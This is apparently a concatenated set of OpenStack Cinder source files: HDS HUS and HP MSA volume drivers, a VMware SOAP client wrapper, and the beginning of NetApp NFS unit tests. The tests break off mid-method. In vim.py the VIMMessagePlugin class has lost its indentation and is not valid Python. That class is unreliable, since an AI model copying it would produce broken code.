                                     self.config['mgmt_ip0'],
                                     self.config['mgmt_ip1'],
                                     self.config['username'],
                                     self.config['password'])
        for line in out.split('\n'):
            if 'HDP' in line:
                (hdp, size, _ign, used) = line.split()[1:5]  # in MB
                if hdp in self.config['hdp'].keys():
                    total_cap += int(size)
                    total_used += int(used)
        hus_stat = {}
        hus_stat['total_capacity_gb'] = int(total_cap / 1024)  # in GB
        hus_stat['free_capacity_gb'] = int((total_cap - total_used) / 1024)
        be_name = self.configuration.safe_get('volume_backend_name')
        hus_stat["volume_backend_name"] = be_name or 'HUSDriver'
        hus_stat["vendor_name"] = 'HDS'
        hus_stat["driver_version"] = HDS_VERSION
        hus_stat["storage_protocol"] = 'iSCSI'
        hus_stat['QoS_support'] = False
        hus_stat['reserved_percentage'] = 0
        return hus_stat

    def _get_hdp_list(self):
        """Get HDPs from HUS.

        :returns: list of HDP pool identifiers reported by the array
        """
        out = self.bend.get_hdp_info(self.config['hus_cmd'],
                                     HDS_VERSION,
                                     self.config['mgmt_ip0'],
                                     self.config['mgmt_ip1'],
                                     self.config['username'],
                                     self.config['password'])
        hdp_list = []
        for line in out.split('\n'):
            if 'HDP' in line:
                hdp_list.extend(line.split()[1:2])
        return hdp_list

    def _check_hdp_list(self):
        """Verify all HDPs specified in the configuration exist.

        Checks the per-service pools plus the snapshot pool.
        :raises: ParameterNotFound for any configured-but-missing HDP
        """
        hdpl = self._get_hdp_list()
        lst = self.config['hdp'].keys()
        lst.extend([self.config['snapshot_hdp'], ])
        for hdp in lst:
            if hdp not in hdpl:
                LOG.error(_("HDP not found: %s") % hdp)
                err = "HDP not found: " + hdp
                raise exception.ParameterNotFound(param=err)

    def _id_to_vol(self, idd):
        """Given the volume id, retrieve the volume object from database."""
        vol = self.db.volume_get(self.context, idd)
        return vol

    def _update_vol_location(self, id, loc):
        """Update the provider location.

        :param id: volume id
        :param loc: new provider_location string
        """
        update = {}
        update['provider_location'] = loc
        self.db.volume_update(self.context, id, update)

    def __init__(self, *args, **kwargs):
        """Initialize, read different config parameters.

        Reads the XML config, queries the array for its id and LU range,
        validates the configured HDP pools, and resolves each service's
        iSCSI portal (ctl/port/iscsi_port) from the array's portal list.
        Setup lives here instead of do_setup — see do_setup's docstring.
        """
        super(HUSDriver, self).__init__(*args, **kwargs)
        self.driver_stats = {}
        self.context = {}
        self.bend = factory_bend()
        self.configuration.append_config_values(HUS_OPTS)
        self.config = _read_config(self.configuration.hds_cinder_config_file)
        (self.arid, self.hus_name, self.lumax) = self._array_info_get()
        self._check_hdp_list()
        start = self.config['lun_start']
        end = self.config['lun_end']
        maxlun = self.lumax
        (self.start, self.end) = _do_lu_range_check(start, end, maxlun)
        iscsi_info = self._get_iscsi_info()
        for svc in self.config['services'].keys():
            svc_ip = self.config['services'][svc]['iscsi_ip']
            if svc_ip in iscsi_info.keys():
                self.config['services'][svc]['port'] = (
                    iscsi_info[svc_ip]['port'])
                self.config['services'][svc]['ctl'] = iscsi_info[svc_ip]['ctl']
                self.config['services'][svc]['iscsi_port'] = (
                    iscsi_info[svc_ip]['iscsi_port'])
            else:  # config iscsi address not found on device!
                LOG.error(_("iSCSI portal not found for service: %s") % svc_ip)
                raise exception.ParameterNotFound(param=svc_ip)
        return

    def check_for_setup_error(self):
        """Returns an error if prerequisites aren't met."""
        # All validation already happened in __init__.
        return

    def do_setup(self, context):
        """Save the request context.

        Setup and verification of the HDS HUS storage connection happen
        in __init__ instead, because retrying (setup/errors) here could
        become an infinite loop.
        """
        self.context = context

    def ensure_export(self, context, volume):
        # Nothing to re-establish; exports are created on connection.
        return

    def create_export(self, context, volume):
        """Create an export. Moved to initialize_connection."""
        return

    @utils.synchronized('hds_hus', external=True)
    def create_volume(self, volume):
        """Create a LU on HUS.

        :returns: {'provider_location': '<array-id>.<lun>'}
        """
        service = self._get_service(volume)
        (_ip, _ipp, _ctl, _port, hdp) = service
        out = self.bend.create_lu(self.config['hus_cmd'],
                                  HDS_VERSION,
                                  self.config['mgmt_ip0'],
                                  self.config['mgmt_ip1'],
                                  self.config['username'],
                                  self.config['password'],
                                  self.arid, hdp, self.start, self.end,
                                  '%s' % (int(volume['size']) * 1024))
        lun = self.arid + '.' + out.split()[1]
        sz = int(out.split()[5])
        LOG.debug("LUN %(lun)s of size %(sz)s MB is created."
                  % {'lun': lun,
                     'sz': sz})
        return {'provider_location': lun}

    @utils.synchronized('hds_hus', external=True)
    def create_cloned_volume(self, dst, src):
        """Create a clone of a volume.

        Array-side duplication of the source LU into the destination
        type's HDP pool; sizes must match exactly.
        """
        if src['size'] != dst['size']:
            msg = 'clone volume size mismatch'
            raise exception.VolumeBackendAPIException(data=msg)
        service = self._get_service(dst)
        (_ip, _ipp, _ctl, _port, hdp) = service
        size = int(src['size']) * 1024
        source_vol = self._id_to_vol(src['id'])
        (arid, slun) = _loc_info(source_vol['provider_location'])['id_lu']
        out = self.bend.create_dup(self.config['hus_cmd'],
                                   HDS_VERSION,
                                   self.config['mgmt_ip0'],
                                   self.config['mgmt_ip1'],
                                   self.config['username'],
                                   self.config['password'],
                                   arid, slun,
                                   hdp,
                                   self.start, self.end,
                                   '%s' % (size))
        lun = self.arid + '.' + out.split()[1]
        size = int(out.split()[5])
        LOG.debug("LUN %(lun)s of size %(size)s MB is cloned."
                  % {'lun': lun,
                     'size': size})
        return {'provider_location': lun}

    @utils.synchronized('hds_hus', external=True)
    def extend_volume(self, volume, new_size):
        """Extend an existing volume.

        :param new_size: new size in GB (converted to MB for the array)
        """
        (arid, lun) = _loc_info(volume['provider_location'])['id_lu']
        self.bend.extend_vol(self.config['hus_cmd'],
                             HDS_VERSION,
                             self.config['mgmt_ip0'],
                             self.config['mgmt_ip1'],
                             self.config['username'],
                             self.config['password'],
                             arid, lun,
                             '%s' % (new_size * 1024))
        LOG.debug("LUN %(lun)s extended to %(size)s GB."
                  % {'lun': lun,
                     'size': new_size})

    @utils.synchronized('hds_hus', external=True)
    def delete_volume(self, volume):
        """Delete an LU on HUS.

        If the LU is still connected (long-form provider_location with a
        'tgt' section), the iSCSI connection is torn down first.
        """
        prov_loc = volume['provider_location']
        if prov_loc is None:
            return
        info = _loc_info(prov_loc)
        (arid, lun) = info['id_lu']
        if 'tgt' in info.keys():  # connected?
            (_portal, iqn, loc, ctl, port) = info['tgt']
            self.bend.del_iscsi_conn(self.config['hus_cmd'],
                                     HDS_VERSION,
                                     self.config['mgmt_ip0'],
                                     self.config['mgmt_ip1'],
                                     self.config['username'],
                                     self.config['password'],
                                     arid, lun, ctl, port, iqn,
                                     '')
        name = self.hus_name
        LOG.debug("delete lun %(lun)s on %(name)s"
                  % {'lun': lun,
                     'name': name})
        self.bend.delete_lu(self.config['hus_cmd'],
                            HDS_VERSION,
                            self.config['mgmt_ip0'],
                            self.config['mgmt_ip1'],
                            self.config['username'],
                            self.config['password'],
                            arid, lun)

    def remove_export(self, context, volume):
        """Disconnect a volume from an attached instance."""
        # Handled in terminate_connection; nothing to do here.
        return

    @utils.synchronized('hds_hus', external=True)
    def initialize_connection(self, volume, connector):
        """Map the created volume to connector['initiator'].

        Extends provider_location to the long
        'portal,iqn,loc,ctl,port' form so later calls can detect the
        active connection, and returns the iSCSI properties dict.
        """
        service = self._get_service(volume)
        (ip, ipp, ctl, port, _hdp) = service
        info = _loc_info(volume['provider_location'])
        if 'tgt' in info.keys():  # spurious repeat connection
            return
        (arid, lun) = info['id_lu']
        loc = arid + '.' + lun
        iqn = HI_IQN + connector['host']
        out = self.bend.add_iscsi_conn(self.config['hus_cmd'],
                                       HDS_VERSION,
                                       self.config['mgmt_ip0'],
                                       self.config['mgmt_ip1'],
                                       self.config['username'],
                                       self.config['password'],
                                       arid, lun, ctl, port, iqn,
                                       connector['initiator'])
        hus_portal = ip + ':' + ipp
        tgt = hus_portal + ',' + iqn + ',' + loc + ',' + ctl + ',' + port
        properties = {}
        hlun = out.split()[1]
        properties['provider_location'] = tgt
        self._update_vol_location(volume['id'], tgt)
        properties['target_discovered'] = False
        properties['target_portal'] = hus_portal
        properties['target_iqn'] = iqn
        properties['target_lun'] = hlun
        properties['volume_id'] = volume['id']
        return {'driver_volume_type': 'iscsi', 'data': properties}

    @utils.synchronized('hds_hus', external=True)
    def terminate_connection(self, volume, connector, **kwargs):
        """Terminate a connection to a volume.

        Shrinks provider_location back to the short '<arid>.<lun>' form.
        """
        info = _loc_info(volume['provider_location'])
        if 'tgt' not in info.keys():  # spurious disconnection
            return
        (arid, lun) = info['id_lu']
        (_portal, iqn, loc, ctl, port) = info['tgt']
        self.bend.del_iscsi_conn(self.config['hus_cmd'],
                                 HDS_VERSION,
                                 self.config['mgmt_ip0'],
                                 self.config['mgmt_ip1'],
                                 self.config['username'],
                                 self.config['password'],
                                 arid, lun, ctl, port, iqn,
                                 connector['initiator'])
        self._update_vol_location(volume['id'], loc)
        return {'provider_location': loc}

    @utils.synchronized('hds_hus', external=True)
    def create_volume_from_snapshot(self, volume, snapshot):
        """Create a volume from a snapshot.

        Duplicates the snapshot LU into the new volume type's HDP pool.
        """
        size = int(snapshot['volume_size']) * 1024
        (arid, slun) = _loc_info(snapshot['provider_location'])['id_lu']
        service = self._get_service(volume)
        (_ip, _ipp, _ctl, _port, hdp) = service
        out = self.bend.create_dup(self.config['hus_cmd'],
                                   HDS_VERSION,
                                   self.config['mgmt_ip0'],
                                   self.config['mgmt_ip1'],
                                   self.config['username'],
                                   self.config['password'],
                                   arid, slun, hdp,
                                   self.start, self.end,
                                   '%s' % (size))
        lun = self.arid + '.' + out.split()[1]
        sz = int(out.split()[5])
        LOG.debug("LUN %(lun)s of size %(sz)s MB is created from snapshot."
                  % {'lun': lun,
                     'sz': sz})
        return {'provider_location': lun}

    @utils.synchronized('hds_hus', external=True)
    def create_snapshot(self, snapshot):
        """Create a snapshot.

        Duplicates the source LU into the dedicated snapshot HDP pool.
        """
        source_vol = self._id_to_vol(snapshot['volume_id'])
        size = int(snapshot['volume_size']) * 1024
        (arid, slun) = _loc_info(source_vol['provider_location'])['id_lu']
        out = self.bend.create_dup(self.config['hus_cmd'],
                                   HDS_VERSION,
                                   self.config['mgmt_ip0'],
                                   self.config['mgmt_ip1'],
                                   self.config['username'],
                                   self.config['password'],
                                   arid, slun,
                                   self.config['snapshot_hdp'],
                                   self.start, self.end,
                                   '%s' % (size))
        lun = self.arid + '.' + out.split()[1]
        size = int(out.split()[5])
        LOG.debug("LUN %(lun)s of size %(size)s MB is created as snapshot."
                  % {'lun': lun,
                     'size': size})
        return {'provider_location': lun}

    @utils.synchronized('hds_hus', external=True)
    def delete_snapshot(self, snapshot):
        """Delete a snapshot."""
        loc = snapshot['provider_location']
        if loc is None:  # to take care of spurious input
            return  # which could cause exception.
        (arid, lun) = loc.split('.')
        self.bend.delete_lu(self.config['hus_cmd'],
                            HDS_VERSION,
                            self.config['mgmt_ip0'],
                            self.config['mgmt_ip1'],
                            self.config['username'],
                            self.config['password'],
                            arid, lun)
        LOG.debug("LUN %s is deleted." % lun)
        return

    @utils.synchronized('hds_hus', external=True)
    def get_volume_stats(self, refresh=False):
        """Get volume stats. If 'refresh', run update the stats first."""
        if refresh:
            self.driver_stats = self._get_stats()
        return self.driver_stats
|
adelina-t/cinder | cinder/volume/drivers/san/hp/hp_msa_fc.py | # Copyright 2014 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
from cinder.openstack.common import log as logging
from cinder import utils
import cinder.volume.driver
from cinder.volume.drivers.san.hp import hp_msa_common as hpcommon
from cinder.volume.drivers.san import san
from cinder.zonemanager import utils as fczm_utils
LOG = logging.getLogger(__name__)
class HPMSAFCDriver(cinder.volume.driver.FibreChannelDriver):
    """Fibre Channel volume driver for HP MSA arrays.

    Thin wrapper around HPMSACommon: each operation logs into the array,
    delegates, and always logs out in a finally block.  The 'msa'
    interprocess lock serializes all array access.
    """
    VERSION = "0.1"

    def __init__(self, *args, **kwargs):
        super(HPMSAFCDriver, self).__init__(*args, **kwargs)
        # Created lazily in do_setup(); None until then.
        self.common = None
        self.configuration.append_config_values(hpcommon.hpmsa_opt)
        self.configuration.append_config_values(san.san_opts)

    def _init_common(self):
        """Build the shared HPMSACommon helper from the configuration."""
        return hpcommon.HPMSACommon(self.configuration)

    def _check_flags(self):
        """Ensure the mandatory SAN connection options are configured."""
        required_flags = ['san_ip', 'san_login', 'san_password']
        self.common.check_flags(self.configuration, required_flags)

    def do_setup(self, context):
        """Instantiate the common helper and validate configuration."""
        self.common = self._init_common()
        self._check_flags()
        self.common.do_setup(context)

    def check_for_setup_error(self):
        self._check_flags()

    @utils.synchronized('msa', external=True)
    def create_volume(self, volume):
        self.common.client_login()
        try:
            metadata = self.common.create_volume(volume)
            return {'metadata': metadata}
        finally:
            self.common.client_logout()

    @utils.synchronized('msa', external=True)
    def create_volume_from_snapshot(self, volume, src_vref):
        self.common.client_login()
        try:
            self.common.create_volume_from_snapshot(volume, src_vref)
        finally:
            self.common.client_logout()

    @utils.synchronized('msa', external=True)
    def create_cloned_volume(self, volume, src_vref):
        self.common.client_login()
        try:
            new_vol = self.common.create_cloned_volume(volume, src_vref)
            return {'metadata': new_vol}
        finally:
            self.common.client_logout()

    @utils.synchronized('msa', external=True)
    def delete_volume(self, volume):
        self.common.client_login()
        try:
            self.common.delete_volume(volume)
        finally:
            self.common.client_logout()

    @fczm_utils.AddFCZone
    @utils.synchronized('msa', external=True)
    def initialize_connection(self, volume, connector):
        """Map the volume and return FC connection properties.

        :returns: dict with driver_volume_type 'fibre_channel' and the
                  target LUN plus active target WWNs
        """
        self.common.client_login()
        try:
            data = {}
            data['target_lun'] = self.common.map_volume(volume, connector)
            ports = self.common.get_active_fc_target_ports()
            data['target_discovered'] = True
            data['target_wwn'] = ports
            info = {'driver_volume_type': 'fibre_channel',
                    'data': data}
            return info
        finally:
            self.common.client_logout()

    @fczm_utils.RemoveFCZone
    @utils.synchronized('msa', external=True)
    def terminate_connection(self, volume, connector, **kwargs):
        self.common.client_login()
        try:
            self.common.unmap_volume(volume, connector)
        finally:
            self.common.client_logout()

    @utils.synchronized('msa', external=True)
    def get_volume_stats(self, refresh=False):
        """Return driver stats, refreshing from the array when asked."""
        # Only log in when we actually need to talk to the array.
        if refresh:
            self.common.client_login()
        try:
            stats = self.common.get_volume_stats(refresh)
            stats['storage_protocol'] = 'FC'
            stats['driver_version'] = self.VERSION
            backend_name = self.configuration.safe_get('volume_backend_name')
            stats['volume_backend_name'] = (backend_name or
                                            self.__class__.__name__)
            return stats
        finally:
            if refresh:
                self.common.client_logout()

    @utils.synchronized('msa', external=True)
    def create_export(self, context, volume):
        # Export handling happens in initialize_connection.
        pass

    @utils.synchronized('msa', external=True)
    def ensure_export(self, context, volume):
        pass

    @utils.synchronized('msa', external=True)
    def remove_export(self, context, volume):
        pass

    @utils.synchronized('msa', external=True)
    def create_snapshot(self, snapshot):
        self.common.client_login()
        try:
            self.common.create_snapshot(snapshot)
        finally:
            self.common.client_logout()

    @utils.synchronized('msa', external=True)
    def delete_snapshot(self, snapshot):
        self.common.client_login()
        try:
            self.common.delete_snapshot(snapshot)
        finally:
            self.common.client_logout()

    @utils.synchronized('msa', external=True)
    def extend_volume(self, volume, new_size):
        self.common.client_login()
        try:
            self.common.extend_volume(volume, new_size)
        finally:
            self.common.client_logout()
|
adelina-t/cinder | cinder/volume/drivers/vmware/vim.py | <reponame>adelina-t/cinder
# Copyright (c) 2013 VMware, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Classes for making VMware VI SOAP calls.
"""
import httplib
import urllib2
import suds
from cinder.openstack.common.gettextutils import _
from cinder.volume.drivers.vmware import error_util
from cinder.volume.drivers.vmware import vim_util
# Message fragments used to classify otherwise-generic exceptions raised
# during SOAP calls (matched via str(excep).find() in Vim.__getattr__).
RESP_NOT_XML_ERROR = "Response is 'text/html', not 'text/xml'"
CONN_ABORT_ERROR = 'Software caused connection abort'
ADDRESS_IN_USE_ERROR = 'Address already in use'
def get_moref(value, type):
    """Build a managed object reference.

    :param value: value for the managed object
    :param type: type of the managed object
    :return: Managed object reference carrying the given value and type
    """
    ref = suds.sudsobject.Property(value)
    ref._type = type
    return ref
class VIMMessagePlugin(suds.plugin.MessagePlugin):
def addAttributeForValue(self, node):
"""Helper to handle AnyType.
suds does not handle AnyType properly.
VI SDK requires type attribute to be set when AnyType is used
:param node: XML value node
"""
if node.name == 'value':
node.set('xsi:type', 'xsd:string')
def marshalled(self, context):
"""Marshal soap context.
Provides the plugin with the opportunity to prune empty
nodes and fixup nodes before sending it to the server.
:param context: SOAP context
"""
# suds builds the entire request object based on the wsdl schema.
# VI SDK throws server errors if optional SOAP nodes are sent
# without values, e.g. <test/> as opposed to <test>test</test>
context.envelope.prune()
context.envelope.walk(self.addAttributeForValue)
class Vim(object):
    """The VIM Object.

    Dynamically dispatches VI SDK API calls through ``__getattr__``,
    translating SOAP and transport failures into the driver's
    ``error_util`` exception types.
    """

    def __init__(self, protocol='https', host='localhost', wsdl_loc=None):
        """Create communication interfaces for initiating SOAP transactions.

        :param protocol: http or https
        :param host: Server IPAddress[:port] or Hostname[:port]
        :param wsdl_loc: WSDL file location; defaults to the copy hosted
                         by the server itself
        """
        self._protocol = protocol
        self._host_name = host
        if not wsdl_loc:
            wsdl_loc = Vim._get_wsdl_loc(protocol, host)
        soap_url = vim_util.get_soap_url(protocol, host)
        self._client = suds.client.Client(wsdl_loc, location=soap_url,
                                          plugins=[VIMMessagePlugin()])
        # Resolved through __getattr__; this performs the first SOAP
        # round trip to the server.
        self._service_content = self.RetrieveServiceContent('ServiceInstance')

    @staticmethod
    def _get_wsdl_loc(protocol, host_name):
        """Return default WSDL file location hosted at the server.

        :param protocol: http or https
        :param host_name: ESX/VC server host name
        :return: Default WSDL file location hosted at the server
        """
        return vim_util.get_soap_url(protocol, host_name) + '/vimService.wsdl'

    @property
    def service_content(self):
        """ServiceContent fetched from the server during construction."""
        return self._service_content

    @property
    def client(self):
        """Underlying suds SOAP client."""
        return self._client

    def __getattr__(self, attr_name):
        """Return a handler that makes the API call and gets the result."""

        def retrieve_properties_ex_fault_checker(response):
            """Checks the RetrievePropertiesEx response for errors.

            Certain faults are sent as part of the SOAP body as property of
            missingSet. For example NotAuthenticated fault. The method raises
            appropriate VimFaultException when an error is found.

            :param response: Response from RetrievePropertiesEx API call
            """
            fault_list = []
            if not response:
                # This is the case when the session has timed out. ESX SOAP
                # server sends an empty RetrievePropertiesExResponse. Normally
                # missingSet in the returnval field has the specifics about
                # the error, but that's not the case with a timed out idle
                # session. It is as bad as a terminated session for we cannot
                # use the session. So setting fault to NotAuthenticated fault.
                fault_list = [error_util.NOT_AUTHENTICATED]
            else:
                for obj_cont in response:
                    if hasattr(obj_cont, 'missingSet'):
                        for missing_elem in obj_cont.missingSet:
                            fault_type = missing_elem.fault.fault.__class__
                            # Fault needs to be added to the type of fault
                            # for uniformity in error checking as SOAP faults
                            # define
                            fault_list.append(fault_type.__name__)
            if fault_list:
                exc_msg_list = ', '.join(fault_list)
                raise error_util.VimFaultException(
                    fault_list,
                    _("Error(s): %s occurred in the call to "
                      "RetrievePropertiesEx.") % exc_msg_list)

        def vim_request_handler(managed_object, **kwargs):
            """Handler for VI SDK calls.

            Builds the SOAP message and parses the response for fault
            checking and other errors.

            :param managed_object: Managed object reference
            :param kwargs: Keyword arguments of the call
            :return: Response of the API call
            """
            try:
                if isinstance(managed_object, str):
                    # For strings use string value for value and type
                    # of the managed object.
                    managed_object = get_moref(managed_object, managed_object)
                request = getattr(self.client.service, attr_name)
                response = request(managed_object, **kwargs)
                if attr_name.lower() == 'retrievepropertiesex':
                    retrieve_properties_ex_fault_checker(response)
                return response
            except error_util.VimFaultException:
                # Already translated by the fault checker; propagate as is.
                raise
            except suds.WebFault as excep:
                doc = excep.document
                detail = doc.childAtPath('/Envelope/Body/Fault/detail')
                fault_list = []
                for child in detail.getChildren():
                    fault_list.append(child.get('type'))
                raise error_util.VimFaultException(fault_list, excep)
            except AttributeError as excep:
                raise error_util.VimAttributeException(
                    _("No such SOAP method %(attr)s. Detailed "
                      "error: %(excep)s.") %
                    {'attr': attr_name, 'excep': excep})
            except (httplib.CannotSendRequest,
                    httplib.ResponseNotReady,
                    httplib.CannotSendHeader) as excep:
                raise error_util.SessionOverLoadException(
                    _("httplib error in %(attr)s: %(excep)s.") %
                    {'attr': attr_name, 'excep': excep})
            except (urllib2.URLError, urllib2.HTTPError) as excep:
                raise error_util.VimConnectionException(
                    _("urllib2 error in %(attr)s: %(excep)s.") %
                    {'attr': attr_name, 'excep': excep})
            except Exception as excep:
                # Socket errors which need special handling for they
                # might be caused by server API call overload.
                # NOTE: the original check was "(find(a) != -1 or
                # find(b)) != -1", which compares a bool to -1 and is
                # therefore always true; the comparison now applies to
                # each find() result individually.
                if (str(excep).find(ADDRESS_IN_USE_ERROR) != -1 or
                        str(excep).find(CONN_ABORT_ERROR) != -1):
                    raise error_util.SessionOverLoadException(
                        _("Socket error in %(attr)s: %(excep)s.") %
                        {'attr': attr_name, 'excep': excep})
                # Type error that needs special handling for it might be
                # caused by server API call overload
                elif str(excep).find(RESP_NOT_XML_ERROR) != -1:
                    raise error_util.SessionOverLoadException(
                        _("Type error in %(attr)s: %(excep)s.") %
                        {'attr': attr_name, 'excep': excep})
                else:
                    raise error_util.VimException(
                        _("Error in %(attr)s. Detailed error: %(excep)s.") %
                        {'attr': attr_name, 'excep': excep})

        return vim_request_handler

    def __repr__(self):
        return "VIM Object."

    def __str__(self):
        return "VIM Object."
|
adelina-t/cinder | cinder/tests/test_netapp_nfs.py | <filename>cinder/tests/test_netapp_nfs.py
# Copyright (c) 2012 NetApp, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Unit tests for the NetApp-specific NFS driver module."""
from lxml import etree
import mock
import mox
from mox import IgnoreArg
from mox import IsA
import os
from cinder import context
from cinder import exception
from cinder.image import image_utils
from cinder.openstack.common.gettextutils import _
from cinder.openstack.common import log as logging
from cinder import test
from cinder.volume import configuration as conf
from cinder.volume.drivers.netapp import api
from cinder.volume.drivers.netapp import nfs as netapp_nfs
from cinder.volume.drivers.netapp import utils
from oslo.config import cfg
CONF = cfg.CONF  # global oslo.config configuration object
LOG = logging.getLogger(__name__)  # module-level logger
def create_configuration():
    """Return a mox-mocked Configuration preloaded with NFS defaults."""
    config = mox.MockObject(conf.Configuration)
    config.append_config_values(mox.IgnoreArg())
    config.nfs_mount_point_base = '/mnt/test'
    config.nfs_mount_options = None
    return config
class FakeVolume(object):
    """Minimal stand-in for a cinder volume supporting dict-style access."""

    def __init__(self, size=0):
        self.size = size
        self.id = hash(self)  # pseudo-unique id derived from the instance
        self.name = None

    def __getitem__(self, key):
        return vars(self)[key]

    def __setitem__(self, key, value):
        vars(self)[key] = value
class FakeSnapshot(object):
    """Minimal stand-in for a cinder snapshot supporting dict-style reads."""

    def __init__(self, volume_size=0):
        self.volume_name = None
        self.name = None
        self.volume_id = None
        self.volume_size = volume_size
        self.user_id = None
        self.status = None

    def __getitem__(self, key):
        return vars(self)[key]
class FakeResponse(object):
    """Fake API response carrying a Status and, on failure, a Reason.

    :param status: Either 'failed' or 'passed'
    """

    def __init__(self, status):
        self.Status = status
        if status == 'failed':
            # Only failed responses carry an error reason.
            self.Reason = 'Sample error'
class NetappDirectCmodeNfsDriverTestCase(test.TestCase):
    """Test direct NetApp C Mode driver."""

    def setUp(self):
        super(NetappDirectCmodeNfsDriverTestCase, self).setUp()
        self._custom_setup()

    def test_create_snapshot(self):
        """Test snapshot can be created and deleted."""
        mox = self.mox
        drv = self._driver
        mox.StubOutWithMock(drv, '_clone_volume')
        drv._clone_volume(IgnoreArg(), IgnoreArg(), IgnoreArg())
        mox.ReplayAll()
        drv.create_snapshot(FakeSnapshot())
        mox.VerifyAll()

    def test_create_volume_from_snapshot(self):
        """Tests volume creation from snapshot."""
        drv = self._driver
        mox = self.mox
        volume = FakeVolume(1)
        snapshot = FakeSnapshot(1)
        location = '127.0.0.1:/nfs'
        expected_result = {'provider_location': location}
        mox.StubOutWithMock(drv, '_clone_volume')
        mox.StubOutWithMock(drv, '_get_volume_location')
        mox.StubOutWithMock(drv, 'local_path')
        mox.StubOutWithMock(drv, '_discover_file_till_timeout')
        mox.StubOutWithMock(drv, '_set_rw_permissions_for_all')
        drv._clone_volume(IgnoreArg(), IgnoreArg(), IgnoreArg())
        drv._get_volume_location(IgnoreArg()).AndReturn(location)
        drv.local_path(IgnoreArg()).AndReturn('/mnt')
        drv._discover_file_till_timeout(IgnoreArg()).AndReturn(True)
        drv._set_rw_permissions_for_all(IgnoreArg())
        mox.ReplayAll()
        loc = drv.create_volume_from_snapshot(volume, snapshot)
        self.assertEqual(loc, expected_result)
        mox.VerifyAll()

    def _prepare_delete_snapshot_mock(self, snapshot_exists):
        """Stub out snapshot-deletion collaborators; return the replayed mox."""
        drv = self._driver
        mox = self.mox
        mox.StubOutWithMock(drv, '_get_provider_location')
        mox.StubOutWithMock(drv, '_volume_not_present')
        mox.StubOutWithMock(drv, '_post_prov_deprov_in_ssc')
        if snapshot_exists:
            mox.StubOutWithMock(drv, '_execute')
            mox.StubOutWithMock(drv, '_get_volume_path')
        drv._get_provider_location(IgnoreArg())
        drv._get_provider_location(IgnoreArg())
        drv._volume_not_present(IgnoreArg(), IgnoreArg())\
            .AndReturn(not snapshot_exists)
        if snapshot_exists:
            drv._get_volume_path(IgnoreArg(), IgnoreArg())
            drv._execute('rm', None, run_as_root=True)
        drv._post_prov_deprov_in_ssc(IgnoreArg())
        mox.ReplayAll()
        return mox

    def test_delete_existing_snapshot(self):
        """delete_snapshot removes the backing file when it exists."""
        drv = self._driver
        mox = self._prepare_delete_snapshot_mock(True)
        drv.delete_snapshot(FakeSnapshot())
        mox.VerifyAll()

    def test_delete_missing_snapshot(self):
        """delete_snapshot is a no-op when the backing file is absent."""
        drv = self._driver
        mox = self._prepare_delete_snapshot_mock(False)
        drv.delete_snapshot(FakeSnapshot())
        mox.VerifyAll()

    def _custom_setup(self):
        """Instantiate the driver under test in proxy mode."""
        kwargs = {}
        kwargs['netapp_mode'] = 'proxy'
        kwargs['configuration'] = create_configuration()
        self._driver = netapp_nfs.NetAppDirectCmodeNfsDriver(**kwargs)

    def test_check_for_setup_error(self):
        """Setup check fails on unset flags and passes once they are set."""
        mox = self.mox
        drv = self._driver
        required_flags = [
            'netapp_transport_type',
            'netapp_login',
            'netapp_password',
            'netapp_server_hostname',
            'netapp_server_port']
        # set required flags
        for flag in required_flags:
            setattr(drv.configuration, flag, None)
        # check exception raises when flags are not set
        self.assertRaises(exception.CinderException,
                          drv.check_for_setup_error)
        # set required flags
        for flag in required_flags:
            setattr(drv.configuration, flag, 'val')
        setattr(drv, 'ssc_enabled', False)
        mox.StubOutWithMock(netapp_nfs.NetAppDirectNfsDriver, '_check_flags')
        netapp_nfs.NetAppDirectNfsDriver._check_flags()
        mox.ReplayAll()
        drv.check_for_setup_error()
        mox.VerifyAll()
        # restore initial FLAGS
        for flag in required_flags:
            delattr(drv.configuration, flag)

    def test_do_setup(self):
        """do_setup delegates to the base class and the custom setup hook."""
        mox = self.mox
        drv = self._driver
        mox.StubOutWithMock(netapp_nfs.NetAppNFSDriver, 'do_setup')
        mox.StubOutWithMock(drv, '_get_client')
        mox.StubOutWithMock(drv, '_do_custom_setup')
        netapp_nfs.NetAppNFSDriver.do_setup(IgnoreArg())
        drv._get_client()
        drv._do_custom_setup(IgnoreArg())
        mox.ReplayAll()
        drv.do_setup(IsA(context.RequestContext))
        mox.VerifyAll()

    def _prepare_clone_mock(self, status):
        """Stub out file-clone collaborators; return the (unreplayed) mox."""
        drv = self._driver
        mox = self.mox
        volume = FakeVolume()
        setattr(volume, 'provider_location', '127.0.0.1:/nfs')
        mox.StubOutWithMock(drv, '_get_host_ip')
        mox.StubOutWithMock(drv, '_get_export_path')
        mox.StubOutWithMock(drv, '_get_if_info_by_ip')
        mox.StubOutWithMock(drv, '_get_vol_by_junc_vserver')
        mox.StubOutWithMock(drv, '_clone_file')
        mox.StubOutWithMock(drv, '_post_prov_deprov_in_ssc')
        drv._get_host_ip(IgnoreArg()).AndReturn('127.0.0.1')
        drv._get_export_path(IgnoreArg()).AndReturn('/nfs')
        drv._get_if_info_by_ip('127.0.0.1').AndReturn(
            self._prepare_info_by_ip_response())
        drv._get_vol_by_junc_vserver('openstack', '/nfs').AndReturn('nfsvol')
        drv._clone_file('nfsvol', 'volume_name', 'clone_name',
                        'openstack')
        drv._post_prov_deprov_in_ssc(IgnoreArg())
        return mox

    def _prepare_info_by_ip_response(self):
